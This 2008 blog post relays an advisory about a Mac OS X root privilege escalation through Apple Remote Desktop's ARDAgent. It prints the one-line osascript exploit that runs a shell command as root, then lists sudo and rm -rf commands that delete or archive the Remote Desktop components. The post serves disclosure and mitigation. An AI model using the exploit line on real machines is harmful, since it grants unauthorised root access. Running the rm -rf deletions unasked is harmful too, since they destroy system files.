« The Perils of Potent Pot | Home | Recent Comments | Categories | Market full of oil, price trend “fake”: Ahmadinejad »

Mac OS X Root Escalation Through AppleScript

Posted on June 19th, 2008 at 8:20 by John Sinteur in category: News -- Write a comment

[Quote:]

“Half the Mac OS X boxes in the world (confirmed on Mac OS X 10.4 Tiger and 10.5 Leopard) can be rooted through AppleScript: osascript -e ‘tell app “ARDAgent” to do shell script “whoami”‘; Works for normal users and admins, provided the normal user wasn’t switched to via fast user switching.

ARDAgent is part of Apple Remote Desktop. This only works for accounts where the user is logged on at the time of the exploit. Here’s how to fully remove it:

## Remove old components
rm -rf "/Applications/Remote Desktop.app"
rm -rf "/System/Library/CoreServices/ARD Agent.app"
rm -rf "/System/Library/CoreServices/RemoteManagement"
rm -rf "/Library/Receipts/RemoteDesktop"*

## Remove preferences
rm -rf "/Users/[ADMIN USER NAME]/Library/Preferences/com.apple.RemoteDesktop.plist"
rm -rf "/Library/Preferences/com.apple.ARDAgent.plist"
rm -rf "/Library/Preferences/com.apple.RemoteDesktop.plist"
rm -rf "/Library/Preferences/com.apple.RemoteManagement.plist"

## Remove local database
rm -rf "/var/db/RemoteManagement"

Or less destructively:

cd /System/Library/CoreServices/RemoteManagement/
sudo tar -czf ARDAgent.app.gz ARDAgent.app
sudo chmod 600 ARDAgent.app.gz
sudo rm -rf ARDAgent.app

previous post: The Perils of Potent Pot

next post: Market full of oil, price trend “fake”: Ahmadinejad